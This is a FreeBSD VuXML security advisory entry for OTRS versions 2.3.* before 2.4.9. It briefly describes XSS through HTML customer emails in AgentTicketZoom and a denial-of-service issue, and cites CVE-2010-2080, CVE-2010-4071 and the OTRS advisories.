FreeBSD VuXML: Documenting security issues in FreeBSD and the FreeBSD Ports Collection

OTRS -- Multiple XSS and denial of service vulnerabilities

Affected packages
2.3.* < otrs < 2.4.9

Details

VuXML ID 96e776c7-e75c-11df-8f26-00151735203a
Discovery 2010-09-15
Entry 2010-11-03

OTRS Security Advisory reports:

AgentTicketZoom is vulnerable to XSS attacks from HTML e-mails:

Whenever a customer sends an HTML e-mail and RichText is enabled in OTRS, javascript contained in the email can do everything in the OTRS agent interface that the agent himself could do.

Most relevant is that this type of exploit can be used in such a way that the agent won't even detect he is being exploited.

References

CVE Name CVE-2010-2080
CVE Name CVE-2010-4071
URL http://otrs.org/advisory/OSA-2010-02-en/
URL http://otrs.org/advisory/OSA-2010-03-en/